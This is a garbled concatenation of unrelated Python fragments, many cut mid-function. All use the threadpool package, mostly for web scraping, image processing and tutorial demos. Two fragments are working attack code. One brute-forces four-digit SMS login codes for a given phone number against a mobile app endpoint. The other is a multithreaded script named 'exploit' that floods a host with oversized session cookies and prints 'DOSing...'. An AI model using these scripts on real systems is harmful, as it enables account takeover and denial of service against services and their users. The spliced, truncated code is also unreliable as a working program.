def getNameSet(self):
    reload(sys)
    sys.setdefaultencoding('utf-8')
    # sys.setdefaultencoding('gbk')
    pool = threadpool.ThreadPool(10)

    # # Get the IEEE search-result pages for each keyword
    # for keyword in keywords:
    #     url = '%s%s%s%s' % ('http://ieeexplore.ieee.org/search/searchresult.jsp?', 'queryText=', keyword, rangeYear)
    #     pageUrlQueue.put(url)
    # requests = threadpool.makeRequests(self.getIeeePages, keywords)
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.pageWrite('searchPages/ieeePages.txt')

    # # Get the ACM search-result pages for each keyword
    # for keyword in keywords:
    #     url = '%s%s' % ('http://dl.acm.org/results.cfm?query=', keyword)
    #     pageUrlQueue.put(url)
    # requests = threadpool.makeRequests(self.getACMPages, keywords)
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.pageWrite('searchPages/acmPages.txt')

    # # Get every document URL from the IEEE search pages
    # pageUrls = open("searchPages/ieeePages.txt").readlines()
    # for page in pageUrls:
    #     pageUrlQueue.put(page)
    # requests = threadpool.makeRequests(self.getIeeeDocuments, pageUrls[0:10])
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.docWrite('docUrls/ieeeDocs.txt')

    # # Get every document URL from the ACM search pages
    # pageUrls = open("searchPages/acmPages.txt").readlines()
    # for page in pageUrls:
    #     pageUrlQueue.put(page)
    # requests = threadpool.makeRequests(self.getACMAuthors, pageUrls[0:10])
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.docWrite('docUrls/acmDocs.txt')

    # # Get every author name from the ACM document pages
    # pageUrls = open("docUrls/acmDocs.txt").readlines()
    # for page in pageUrls:
    #     pageUrlQueue.put(page)
    # requests = threadpool.makeRequests(self.getACMName, pageUrls[0:10])
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.acmWrite('names/acmNames.txt')

    # # Get the Elsevier search-result pages for each keyword
    # for keyword in keywords:
    #     url = '%s%s%s' % ('https://www.elsevier.com/search-results?query=', keyword, '&labels=all')
    #     pageUrlQueue.put(url)
    # numbers = range(0, 10)
    # requests = threadpool.makeRequests(self.getElsDocs, numbers)
    # [pool.putRequest(req) for req in requests]
    # pool.wait()
    # self.pageWrite('searchPages/elsevierPages.txt')

    # Get every author name from the IEEE document URLs
    num = range(0, 10)
    pageUrls = open("docUrls/ieeeDocs.txt").readlines()
    for page in pageUrls:
        pageUrlQueue.put(page)
    requests = threadpool.makeRequests(self.getIeeeName, num)
    [pool.putRequest(req) for req in requests]
    pool.wait()
def judeg_id_list(all_tag_list, cluster_item_tag_abpath_list, result_id_path,
                  cut_pic_name, cluster_id_name, IPC_check, mode,
                  cluster_id_search_range_list):
    cp_list = []
    fun_var = []
    for tag in all_tag_list:
        flag = 0
        id_term = ""
        result_list = my_finds(tag, 0, cluster_item_tag_abpath_list)
        cluster_id_name_flag = 0
        cut_pic_name_flag = 0
        ipc_num_flag = 0
        for result_item in result_list:
            if cluster_id_name_flag == 0:
                if cluster_id_name not in result_item[1]:
                    # check whether the identity info was clustered successfully
                    continue
                else:
                    id_term = result_item[1].split(path_char)[-1].split(".")[0]
                    if mode == "multi_pic":
                        id_term = result_item[1].split(path_char)[-2]
                    cluster_id_name_flag = 1
            # apply the time-range restriction
            id_search_range_find = my_find(id_term, 0, cluster_id_search_range_list)
            if id_search_range_find != []:
                id_search_range = id_search_range_find[1:]
                if result_item[1] not in id_search_range:
                    continue
            if mode == "check_pic":
                if ipc_num_flag == 0:
                    print result_item[1]
                    ipc_num = result_item[1].split(path_char)[-2].split("_")[0]
                    if ipc_num not in IPC_check:
                        continue
                    else:
                        ipc_num_flag = 1
            else:
                if cut_pic_name_flag == 0:
                    if cut_pic_name not in result_item[1]:
                        # check whether the path belongs to another camera
                        continue
                    else:
                        cut_pic_name_flag = 1
            if mode == "check_pic":
                if not os.path.exists(os.path.join(result_id_path, id_term)):
                    print "mkdir", os.path.join(result_id_path, id_term)
                    os.mkdir(os.path.join(result_id_path, id_term))
                flag = 1
                break
            else:
                flag = 1
                break
        if flag == 1:
            cnt = 0
            for result_item in result_list:
                # apply the time restriction
                id_search_range_find = my_find(id_term, 0, cluster_id_search_range_list)
                cnt = cnt + 1
                print cnt, "/", len(result_list)
                if cluster_id_name in result_item[1]:
                    print "check-proc"
                    print result_item[1]
                    print os.path.join(result_id_path, id_term, id_term + ".jpg")
                    json_path = result_item[1].split(".")[0] + ".json"
                    # shutil.copyfile(result_item[1], os.path.join(result_id_path, id_term, id_term + ".jpg"))
                    if mode == "check_pic":
                        cp_list.append([result_item[1],
                                        os.path.join(result_id_path, id_term, id_term + ".jpg")])
                        cp_list.append([json_path,
                                        os.path.join(result_id_path, id_term, id_term + ".json")])
                    # elif mode == "multi_pic":
                    #     for img in os.listdir(result_item[1]):
                    #         img_path = os.path.join(result_item[1], img)
                    #         cp_list.append([img_path, os.path.join(result_id_path, id_term, img)])
                else:
                    print "multi-proc"
                    print result_item[1]
                    if id_search_range_find != []:
                        id_search_range = id_search_range_find[1:]
                        if result_item[1] not in id_search_range:
                            continue
                    for img in os.listdir(result_item[1]):
                        img_path = os.path.join(result_item[1], img)
                        # print img_path
                        # print os.path.join(result_id_path, id_term, img)
                        # shutil.copyfile(img_path, os.path.join(result_id_path, id_term, img))
                        cp_list.append([img_path,
                                        os.path.join(result_id_path, id_term, img)])
    # for ele in cp_list:
    #     try:
    #         shutil.copyfile(ele[0], ele[1])
    #     except Exception as e:
    #         print(e)
    for i in range(0, len(cp_list)):
        cpfile_A = cp_list[i][0]
        cpfile_B = cp_list[i][1]
        fun_var.append(([cpfile_A, cpfile_B, i, len(cp_list) - 1], None))
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(cp_exec, fun_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
exception_handler = logging.FileHandler('exception.log')
process_handler.setFormatter(formatter)
exception_handler.setFormatter(formatter)
process_log.addHandler(process_handler)
exception_log.addHandler(exception_handler)

# URL prefix used when requesting images
prefix = 'http://image.media.lianjia.com'
subprefix = '!m_fit,w_300,h_300'

# Download images by URL
# Queue that holds the image file names
req_queue = Queue.Queue(256)
download_pool = threadpool.ThreadPool(16)

# request id
global request_id
request_id = int(time.time())
q = threading.Lock()


# Parse the data in the request and put it into the queue
# Args:
#     req_data: request data
# Returns:
#     None
def download_and_generate_hash(img_url, result, ret, request_seq):
    try:
        # check whether img_url is empty
def multi_run(uids, keyword):
    pool = threadpool.ThreadPool(10)
    args_list = [{'uid': uid, 'keyword': keyword} for uid in uids]
    reqs = threadpool.makeRequests(run, args_list)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def get_output2(data):
    pool = threadpool.ThreadPool(40)
    requests = threadpool.makeRequests(find_ans2, data)
    [pool.putRequest(req) for req in requests]
    pool.wait()
from common.common_test import *
import threadpool  # this demo uses the third-party threadpool package
"""
References:
    some website (forgotten which one)
    "Core Python Programming"
Contents:
    1. Using threadpool
    2. The ThreadPoolExecutor from concurrent.futures, used in threading_demo.py
    ...
"""
# Specify which of programs 1-7 to run, or set [0] to run all of them
exe_list = [0]

print('1. Using threadpool')


def func(num):
    print('num:' + repr(num))


if is_exec_curr(exe_list, 1) and __name__ == '__main__':
    res = list(range(100))
    pool = threadpool.ThreadPool(20)  # 20 worker threads
    # build every work request: the first argument is the function, the second is the list of values to pass
    requests = threadpool.makeRequests(func, res)
    for request in requests:
        pool.putRequest(request)
    # [pool.putRequest(request) for request in requests]  # equivalent to the for loop above
    pool.wait()  # block until all worker threads have finished
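# A minimal sketch, for comparison with item 1 above, of the same fan-out using
# the standard library's concurrent.futures.ThreadPoolExecutor that the header
# attributes to threading_demo.py. Reusing exe_list slot 2 for it here is an
# assumption, not part of the original file.
from concurrent.futures import ThreadPoolExecutor

if is_exec_curr(exe_list, 2) and __name__ == '__main__':
    print('2. Using concurrent.futures.ThreadPoolExecutor')
    with ThreadPoolExecutor(max_workers=20) as executor:
        # map() submits one call of func per value; leaving the with-block
        # waits for every submitted call to finish
        list(executor.map(func, range(100)))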
        flag = 1
    except Exception as e:
        print(userid + "****" + "Error!!! " + e.message + "\n")
        errorTime += 1
        time.sleep(10)
    if flag == 1:
        successusers.append(userid)
        if len(successusers) % 25 == 0:
            writer = open('D:\users\\v-zhaozl\Weibo\\' + "Success", 'w')
            for s in successusers:
                writer.write(s + "\n")
            writer.close()
    print(userid + " End")


all_the_text = []
file_object = open('D:\users\\v-zhaozl\Weibo\weiboids.txt', 'r')
try:
    all_the_text = file_object.read()
finally:
    file_object.close()
userids = []
for text in all_the_text.split("\n"):
    userids.append(text.split("\t")[1])
pool = threadpool.ThreadPool(10)
requests = threadpool.makeRequests(threadFun, userids)
[pool.putRequest(req) for req in requests]
pool.wait()
                shop_name) > 0 and '共<span id="J_resCount">0</span>件商品' not in response.text:  # the page does not report 0 items
            msg = shop_name
            vender_id = doc("#vender_id").val()
            if vender_id and len(vender_id) > 0:
                print(shop_name)
            else:
                msg = '空'  # "empty"
        else:
            msg = '无'  # "none"
        file_info = str(shopId) + "\t" + str(vender_id) + "\t" + msg
        with open(cross_files, "a+", encoding='utf-8') as w:
            w.write(file_info)
            w.write('\n')
        gc.collect()
    except IOError:
        gc.collect()
        time.sleep(3)
        run_page(shopId)


make_data()
del cross_start
pool = thread_pool.ThreadPool(15)
rt = thread_pool.makeRequests(run_page, shop_list)
[pool.putRequest(req) for req in rt]
pool.wait()
print('Done!')
def md5(s):
    m = hashlib.md5()
    m.update(s.encode("utf-8"))
    return m.hexdigest()


gdict = {
    'todo_url_list': set(list()),
    'all_url_list': set(list()),
}
all_url_list = set(list())
undonejobs = dict()
threadnum = 16
# integer division so ThreadPool() receives an int worker count
downpool = threadpool.ThreadPool(threadnum // 2)
pagepool = threadpool.ThreadPool(threadnum)
downlock = threading.Lock()
tasknum = 0


def unifyurl(baseurl, href):
    # resolve relative URLs against the base URL
    if baseurl is not None:
        baseurl = baseurl.strip()  # strip surrounding whitespace
    if href is not None:
        href = href.strip()
    if baseurl is not None:
        if href.startswith('//'):
            href = baseurl.split('//')[0] + href
        elif href.startswith('/'):
    OSTYPE = 'windows'
elif 'posix' in os.name:
    OSTYPE = 'linux'
else:
    Log.info('Unrecognized operating system type')
    sys.exit(-1)

# Set up proxy information; if the server cannot reach the external network, connect through a proxy
if 'ON' in use_proxy:
    socks.set_default_proxy(socks.SOCKS5, PROXY_HOST, PROXY_PORT, True, PROXY_USER, PROXY_PAWD)
    socket.socket = socks.socksocket

# Read the configured thread count and start the thread pool;
# orders are processed in parallel over time ranges and order numbers
threadNum = inCfg['TOOL']['thread']
pool = threadpool.ThreadPool(int(threadNum))

# A manual run takes 2 arguments: the satellite name and the time range
if len(args) == 2:
    Log.info(u'Running the ordering program manually -----------------------------')
    satID = args[0]     # full satellite name
    str_time = args[1]  # time range for this run
    # Parse the time range: convert YYYYMMDD-YYYYMMDD into datetime start and end times
    date_s, date_e = pb_time.arg_str2date(str_time)
    # Rebuild the date lists according to the data rules
    NumDateDict1 = {}
    NumDateDict2 = {}
    # Build the argument list to pass to the thread pool
#coding=utf8
import threadpool
import time
import urllib2

urls = [
    'http://www.163.com',
    'http://www.amazon.com',
    'http://www.ebay.com',
    'http://www.alibaba.com'
]


def myRequest(url):
    resp = urllib2.urlopen(url)
    print url, resp.getcode()


def timeCost(request, n):
    print "Elapsed time: %s" % (time.time() - start)


start = time.time()
pool = threadpool.ThreadPool(4)  # ThreadPool(poolsize): at most poolsize worker threads are created
reqs = threadpool.makeRequests(myRequest, urls, timeCost)  # makeRequests(some_callable, list_of_args, callback)
[pool.putRequest(req) for req in reqs]
pool.wait()
import time
import threadpool  # install first if needed: pip install threadpool


# A slow function; we open multiple threads to run many calls concurrently
def get_html(url):
    time.sleep(3)
    print(url)


urls = [i for i in range(10)]  # generate 10 values (concise comprehension instead of a for loop)
pool = threadpool.ThreadPool(10)                    # create a thread pool with 10 worker threads
requests = threadpool.makeRequests(get_html, urls)  # build the 10 work requests for the pool
for req in requests:     # submit the tasks
    pool.putRequest(req)
pool.wait()              # block until all tasks are done
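# A minimal sketch of passing more than one argument per task (get_html2 is a
# hypothetical helper, not part of the original demo): threadpool.makeRequests
# also accepts items of the form (positional_args_list, keyword_args_dict),
# the same pattern several scripts in this collection use.
def get_html2(url, retries):
    time.sleep(1)
    print(url, retries)


params = [([i, 3], None) for i in range(10)]            # positional args, no kwargs
requests2 = threadpool.makeRequests(get_html2, params)
for req in requests2:
    pool.putRequest(req)                                # the pool above can be reused after wait()
pool.wait()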
def run(self, ids):
    pool = threadpool.ThreadPool(12)
    request = threadpool.makeRequests(self.spider, ids)
    [pool.putRequest(req) for req in request]
    pool.wait()
        'sumbit': 'getMobileCode'
    }
    # submit=getMobileCode&mobile=&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans
    headers = {'User-Agent': '6.0.1 rv:1537 (iPhone; iPhone OS 7.0.4; zh_CN)'}
    url = "http://app6.117go.com/demo27/php/loginAction.php?submit=getMobileCode&mobile=%s&v=i6.0.1&vc=AppStore&vd=ae8fbfa52daac979&lang=zh-Hans" % phone
    try:
        req = requests.get(url, headers=headers, timeout=3)
        print req.url
        req_result = json.loads(req.content)['OK']
    except Exception, e:
        print e
        sys.exit(1)
    if int(req_result) == 0:
        print "code has been sent"


if __name__ == '__main__':
    args = []
    status = 0
    if len(sys.argv) != 2:
        print "usage: %s phone" % sys.argv[0]
        sys.exit(1)
    phone = sys.argv[1]
    send_code()
    for i in range(1000, 9999):  # note: range() excludes the upper bound, so 9999 itself is never tried
        args.append(i)
    pool = tp.ThreadPool(5)
    reqs = tp.makeRequests(checkcode, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def get(self):
    pool = threadpool.ThreadPool(10)
    requests = threadpool.makeRequests(self._get, self.urls)
    [pool.putRequest(req) for req in requests]
    pool.wait()
    _WebTmp = _WebTmp[0]
    _WebTmp = _WebTmp.split('\'')
    _WebTmp = _WebTmp[len(_WebTmp) - 1]
    _WebTmp = _WebTmp.split('=')
    _SessionID = _WebTmp[0]
    _Session = _WebTmp[1]
    for i in range(4000):
        _Session += randomCharacter()
    _Cookies = {_SessionID: _Session}
    while True:
        _Flag += 1
        try:
            _Req = requests.get(_Host, cookies=_Cookies, headers=HEADER)
            print "[%s] DOSing... " % _Flag
            print _Req.content
        except:
            continue


if __name__ == '__main__':
    args = []
    for i in range(THREAD_NUM):
        args.append(args)  # one placeholder entry per thread, so makeRequests builds THREAD_NUM work requests
    pool = tp.ThreadPool(THREAD_NUM)
    reqs = tp.makeRequests(exploit, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
def run(args):
    pool = threadpool.ThreadPool(5)
    requests = threadpool.makeRequests(parseArticleWithAccount, args)
    [pool.putRequest(req) for req in requests]
    pool.wait()
def predict_my(visual=True, model_weight="model_final.pth"):
    cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_weight)
    predictor = DefaultPredictor(cfg)
    cfg.TEST.DETECTIONS_PER_IMAGE = 500
    # test_json = "/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person.json"
    # test_image_path = "/root/data/rubzz/ruby/ruby_output/test/person/split_test_method2_person"
    # test_json = "/root/data/gvision/dataset/predict/person/test_person.json"
    # test_image_path = "/root/data/gvision/dataset/predict/person/img"
    test_json = "/root/data/rubzz/ruby/ruby_output/test/person/img_testone/test_person_onetest.json"
    test_image_path = '/root/data/rubzz/ruby/ruby_output/test/person/img_testone'
    dataset_test_dicts = json.load(open(test_json, "r"))
    # MetadataCatalog.get("pandahead").set(thing_classes=["head"], thing_dataset_id_to_contiguous_id={1: 0})
    train_dicts_metadata = MetadataCatalog.get("pandahead")
    print("metadata----------------", train_dicts_metadata)
    print("predict-------------------start")
    "thing_classes=['visible body', 'full body', 'head', 'vehicle'], thing_dataset_id_to_contiguous_id={1: 0, 2: 1, 3: 2, 4: 3}"
    os.makedirs(os.path.join(cfg.OUTPUT_DIR, "my_predict"), exist_ok=True)
    # for j, (file_name, dict_value) in enumerate(random.sample(dataset_test_dicts.items(), 5)):
    # pbar = tqdm(total=len(dataset_test_dicts), ncols=50)
    import threadpool
    func_var = [([file_name, dict_value], None)
                for file_name, dict_value in dataset_test_dicts.items()]
    # shared accumulator filled by the worker threads below and written out at the end
    coco_list_results = []

    def sayhello(file_name, dict_value):
        print("{}------------------{}\t{}".format(
            os.path.join(test_image_path, file_name), model_weight[6:-4],
            len(dataset_test_dicts.keys())), flush=True)
        img = cv2.imread(os.path.join(test_image_path, file_name))
        pre_output = predictor(img)
        num_instance = 0
        cid = [0, 0, 0, 0]
        pre_instances = pre_output['instances']
        if "instances" in pre_output and len(pre_instances) != 0:
            coco_list_result, num_instance, cid = instances_to_coco_json(
                pre_instances.to(torch.device("cpu")), dict_value["image id"])
            # extend the shared list; list.extend is effectively atomic under the GIL
            coco_list_results.extend(coco_list_result)
        srcfile, paras = file_name.split('___')
        srcfile = srcfile.replace('_IMG', '/IMG')
        image_id = srcfile[-2:]
        scale, left, up = paras.replace('.jpg', '').split('__')
        if visual and (up == "16480" or up == "12360"):
            print("visual-------------------------", file_name)
            cv2.putText(img,
                        f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}",
                        (15, 80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138, 0, 255), 4)
            v = Visualizer(img[:, :, ::-1], metadata=train_dicts_metadata,
                           scale=1)  # ColorMode.SEGMENTATION or ColorMode.IMAGE_BW
            v = v.draw_instance_predictions(pre_instances.to("cpu"))  # draw xyxy
            os.makedirs(os.path.join(cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01"), exist_ok=True)
            cv2.imwrite(os.path.join(cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01",
                                     "visual{}_{}".format(model_weight[6:-4], file_name)),
                        v.get_image()[:, :, ::-1])
        # pbar.update(1)

    # pbar.close()
    pool = threadpool.ThreadPool(500)
    requests = threadpool.makeRequests(sayhello, func_var)
    [pool.putRequest(req) for req in requests]
    pool.wait()
    # Previous single-threaded version:
    # for file_name, dict_value in dataset_test_dicts.items():
    #     # print("{}\t{}------------------{}\t{}".format(os.path.join(test_image_path, file_name), j, model_weight[6:-4], len(dataset_test_dicts.keys())), flush=True)
    #     img = cv2.imread(os.path.join(test_image_path, file_name))
    #     pre_output = predictor(img)
    #     num_instance = 0
    #     cid = [0, 0, 0, 0]
    #     pre_instances = pre_output['instances']
    #     if "instances" in pre_output and len(pre_instances) != 0:
    #         coco_list_result, num_instance, cid = instances_to_coco_json(pre_instances.to(torch.device("cpu")), dict_value["image id"])
    #         coco_list_results = coco_list_results + coco_list_result
    #         srcfile, paras = file_name.split('___')
    #         srcfile = srcfile.replace('_IMG', '/IMG')
    #         image_id = srcfile[-2:]
    #         scale, left, up = paras.replace('.jpg', '').split('__')
    #         if visual and (up == "16480" or up == "12360"):
    #             print("visual-------------------------", file_name)
    #             cv2.putText(img, f"len:{num_instance} c1:{cid[0]} c2:{cid[1]} c3:{cid[2]} c4:{cid[3]}", (15, 80), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (138, 0, 255), 4)
    #             v = Visualizer(img[:, :, ::-1], metadata=train_dicts_metadata, scale=1)  # ColorMode.SEGMENTATION or ColorMode.IMAGE_BW
    #             v = v.draw_instance_predictions(pre_instances.to("cpu"))  # draw xyxy
    #             os.makedirs(os.path.join(cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01"), exist_ok=True)
    #             cv2.imwrite(os.path.join(cfg.OUTPUT_DIR, "d2_predict_split_visual_17_01", "visual{}_{}".format(model_weight[6:-4], file_name)), v.get_image()[:, :, ::-1])
    tempc = os.path.join(
        cfg.OUTPUT_DIR, "my_predict",
        f"{model_weight[6:-4]}_nms{cfg.MODEL.RETINANET.NMS_THRESH_TEST}_fs{cfg.MODEL.RETINANET.SCORE_THRESH_TEST}_17_01.json"
    )
    print(tempc)
    f1 = open(tempc, 'w')
    f1.write(json.dumps(coco_list_results, cls=MyEncoder))
    print("predict----------------end")
def __init__(self, maxsize=20, q_size=20, resq_size=200, name=None):
    # self.workingq = queue.Queue(maxsize)
    self.tpool = threadpool.ThreadPool(maxsize, q_size=q_size, resq_size=resq_size)
for district in districts:
    areas_of_district = get_areas(city, district)
    print('{0}: Area list: {1}'.format(district, areas_of_district))
    # list.extend: L1.extend(L2) appends every element of L2 to the end of L1
    areas.extend(areas_of_district)
    # use a dict to record which district each area belongs to, e.g. {'beicai': 'pudongxinqu', }
    for area in areas_of_district:
        area_dict[area] = district
print("Area:", areas)
print("District and areas:", area_dict)

# prepare the arguments for the thread pool
nones = [None for i in range(len(areas))]
city_list = [city for i in range(len(areas))]
args = zip(zip(city_list, areas), nones)
# areas = areas[0: 1]  # For debugging

# write one file per area, and start one thread to handle each area
pool_size = thread_pool_size
pool = threadpool.ThreadPool(pool_size)
my_requests = threadpool.makeRequests(collect_area_ershou, args)
[pool.putRequest(req) for req in my_requests]
pool.wait()
pool.dismissWorkers(pool_size, do_join=True)  # dismiss the workers when finished

# stop timing and report the results
t2 = time.time()
print("Total crawl {0} areas.".format(len(areas)))
print("Total cost {0} second to crawl {1} data items.".format(t2 - t1, total_num))
            # if comm_num > 0:  # if the item has comments, submit a task to fetch them
            #     id_comm_dict[item_id] = get_comm.delay(inner_url, comm_num)
            shop_info_data = get_shop_info(inner_url)
            price = item.select("div.p-price strong i")[0].text
            book_name = item.select('div.p-name em')[0].text
            shop_info_data['book_name'] = book_name
            shop_info_data['price'] = price
            shop_info_data['comm_num'] = comm_num
            shop_info_data['item_id'] = item_id
            print(shop_info_data)
            write_csv(shop_info_data)


if __name__ == '__main__':
    keyword = input('Enter the book title to search for: ')
    urls = []
    for i in range(5, 7, 2):
        url = 'https://search.jd.com/Search?keyword={}&suggest=1.def.0.V05--38s0&wq={}&page={}&s=101&click=0'.format(
            keyword, keyword, i)
        urls.append(([url, ], None))
    pool = threadpool.ThreadPool(3)
    reque = threadpool.makeRequests(get_index, urls)
    for c in reque:
        pool.putRequest(c)
    pool.wait()
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" } main_url = "https://www.ixdzs.com" def get_conn(): conn = MySQLdb.connect(host='localhost', port=3306, user='******', passwd='', db='jianghuiyan', charset='utf8') return conn task_pool = threadpool.ThreadPool(15) request = requests.session() request.keep_alive = False urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_response(url): for i in range(1, 4): try: response = request.get(url, timeout=10, verify=False) return response except BaseException as e: print(e) print("获取" + url + "失败")
def thread_main(item):
    pool = threadpool.ThreadPool(4)
    tasks = threadpool.makeRequests(get_detail, item)
    [pool.putRequest(req) for req in tasks]
    pool.wait()
labels = df.values
m = {}
for val in labels:
    m[val[0]] = val[1]
params = []
idx = 0
for root, dirs, filenames in os.walk(cfg.data_neg_path):
    for each_tif in filenames:
        if '.tif' in each_tif:
            name = each_tif.split('.')[0]
            flag = 'pos' if m[int(name)] == 'Positive' else 'neg'
            path = os.path.join(root, each_tif)                   # ./EDCP/data_append/1/1.tif
            out_patch_path = os.path.join(cfg.patch_data, flag, name)  # ./EDCP_PATCH/pos/1/
            idx += 1
            params.append([path, args.size, args.scale, out_patch_path,
                           args.patch_size, args.nums, args.bin, args.threshold])
# print(idx)
cp('(#b)total_img:\t{}(#)'.format(idx))
pool = threadpool.ThreadPool(args.poolsize)
requests = threadpool.makeRequests(work, params)
[pool.putRequest(req) for req in requests]
pool.wait()
def login_parser(username, password):
    s = requests.Session()
    s.proxies = constant.PROXY
    s.verify = False
    s.headers.update({'Referer': constant.LOGIN_URL})

    s.get(constant.LOGIN_URL)
    content = s.get(constant.LOGIN_URL).content
    html = BeautifulSoup(content, 'html.parser')
    csrf_token_elem = html.find('input', attrs={'name': 'csrfmiddlewaretoken'})

    if not csrf_token_elem:
        raise Exception('Cannot find csrf token to login')
    csrf_token = csrf_token_elem.attrs['value']

    login_dict = {
        'csrfmiddlewaretoken': csrf_token,
        'username_or_email': username,
        'password': password,
    }
    resp = s.post(constant.LOGIN_URL, data=login_dict)
    if 'Invalid username/email or password' in resp.text:
        logger.error('Login failed, please check your username and password')
        exit(1)

    html = BeautifulSoup(s.get(constant.FAV_URL).content, 'html.parser')
    count = html.find('span', attrs={'class': 'count'})
    if not count:
        logger.error("Can't get your number of favorited doujins. Did the login fail?")
    count = int(count.text.strip('(').strip(')').replace(',', ''))
    if count == 0:
        logger.warning('No favorites found')
        return []
    pages = int(count / 25)

    if pages:
        pages += 1 if count % (25 * pages) else 0
    else:
        pages = 1

    logger.info('You have %d favorites in %d pages.' % (count, pages))

    if os.getenv('DEBUG'):
        pages = 1

    ret = []
    doujinshi_id = re.compile('data-id="([\d]+)"')

    def _callback(request, result):
        ret.append(result)

    thread_pool = threadpool.ThreadPool(5)

    for page in range(1, pages + 1):
        try:
            logger.info('Getting doujinshi ids of page %d' % page)
            resp = s.get(constant.FAV_URL + '?page=%d' % page).text
            ids = doujinshi_id.findall(resp)
            requests_ = threadpool.makeRequests(doujinshi_parser, ids, _callback)
            [thread_pool.putRequest(req) for req in requests_]
            thread_pool.wait()
        except Exception as e:
            logger.error('Error: %s, continue', str(e))

    return ret
def __init__(self, config_file, _password):
    """Netconfigit constructor

    Initializes member variables and reads and parses the XML configuration file.
    Starts the local tftp server and creates a temporary directory for holding configs.
    Initializes the device threadpool.

    :param config_file: XML configuration file path
    :param _password: decryption password
    """
    # initialize member variables
    self.device_list = []              # list of device objects defined in the configuration file
    self.device_count = 0              # the number of devices defined in the configuration file
    self.success_list = []             # the list of device actions that have succeeded
    self.failure_list = []             # the list of device actions that have failed
    self.config = 0                    # the minidom XML configuration data structure
    self.config_devices = 0            # pointer to the device elements in the config minidom structure
    self.tftp_thread = 0               # thread pool for running the local tftp server
    self.device_threadpool = 0         # thread pool for running device actions
    self.password = ""                 # decryption password
    self.verbose = 0                   # verbose logging flag
    self.logfile = "./Netconfigit.log" # logfile relative path
    self.plaintext_passwords = ""      # boolean value allows use of plaintext passwords in config xml
    self.transfer_ip = ""              # IP address of the local tftp and/or scp server
    self.scp_username = ""             # username used for scp transfer to the local machine
    self.scp_password = ""             # password used for scp transfer to the local machine
    self.scp_chown = ""                # the group and user to which uploaded files' ownership should be changed
    self.ssh_port = 22                 # port used to ssh to local machine - used by chown
    self.repo_path = ""                # absolute path to the configuration repository
    self.repo_password = ""            # password for accessing the repository
    self.repository = None             # GitPython repository object
    self.tftp_port = "69"              # port used by local tftp server
    self.tftp_root = ""                # root directory used by local tftp server
    self.using_git = 0                 # boolean is set to true if the repository directory is a Git repository
    self.tempdir = ".netconfigit/"     # temporary path for downloading configs
    self.time_start = datetime.now()   # starting time timestamp used for calculating total running-time
    self.time_stop = None              # stopping time timestamp used for calculating total running-time
    self.time_timestamp = time.time()  # starting time timestamp
    # formatted timestamp
    self.timestamp = datetime.fromtimestamp(self.time_timestamp).strftime('%Y-%m-%d %H:%M:%S')

    # create the object used for encrypting/decrypting passwords
    self.password = aescrypt.AESCrypt(_password)

    # parse xml configuration file
    self.config = minidom.parse(config_file)
    logging.info("\nUsing %s", config_file)

    # check and load options from XML
    self.options = self.load_options()

    # check existence of devices in configuration
    if self.config.getElementsByTagName('device'):
        self.config_devices = self.config.getElementsByTagName('device')
    else:
        print "\nNo devices specified - quitting"
        exit(1)

    # load devices from XML configuration into device_list
    load_err = self.load_devices_xml()
    if load_err != "0":
        print load_err
        print "Configuration errors detected - quitting"
        exit(1)

    # create temporary directory for receiving configs
    self.tempdir = os.path.dirname(self.tftp_root + self.tempdir)
    try:
        os.stat(self.tempdir)
    except os.error:
        os.mkdir(self.tempdir)
        logger.info("Creating temporary directory " + self.tempdir)

    # initialize the thread used for the local tftp server and start the server
    self.tftp_thread = threadpool.ThreadPool(1)
    self.tftp_thread.add_task(self.tftp_server)
    # initialize the thread pool used by device actions
    logger.info("Creating %s device threads", 20)
    self.device_threadpool = threadpool.ThreadPool(20)
def get_clean_result(id_relation_path, id_score_clean_path, id_clean_result):
    cp_list = []
    fun_var = []
    # get the live surveillance photo files
    id_path_list, id_path_pic_list = get_live_pic_path_list(id_relation_path)
    # get the cleaning-score cluster file path
    id_cluster_clean_path = id_score_clean_path.replace("id_score.txt", "id_cluster.txt")
    print id_cluster_clean_path
    id_cluster_clean_handle = open(id_cluster_clean_path, "r")
    lines = id_cluster_clean_handle.readlines()
    id_cluster_clean_handle.close()
    # build the cluster-info list to be queried
    cluster_info = []
    cnt = 0
    for line in lines:
        cnt = cnt + 1
        print "get_clean_cluster_info:", cnt, "/", len(lines)
        line = line.strip("\n")
        tag = line.split("@")[-1]
        id_path_pic = line.split("@")[0]
        id_path = id_path_pic.split("#")[0]
        if [id_path_pic, tag, id_path] not in cluster_info:
            cluster_info.append([id_path_pic, tag, id_path])
    cnt = 0
    for id_path_pic in id_path_pic_list:
        cnt = cnt + 1
        print "get_clean:", cnt, "/", len(id_path_pic_list)
        # find the tag of the live surveillance photo
        live_cluster_info_find = my_find(id_path_pic, 0, cluster_info)
        if live_cluster_info_find == []:
            continue
        live_cluster_info_tag = live_cluster_info_find[1]
        # get the corresponding identity info
        live_cluster_info_id_path = live_cluster_info_find[0].split("#")[0]
        # look up all entries with the same id
        live_cluster_info_finds = my_finds(live_cluster_info_id_path, 2, cluster_info)
        if live_cluster_info_finds == []:
            continue
        for live_cluster_info in live_cluster_info_finds:
            img_path = path_char.join(live_cluster_info[0].split("#"))
            img_name = live_cluster_info[0].split("#")[-1]
            tag_check = live_cluster_info[1]
            if tag_check != live_cluster_info_tag:
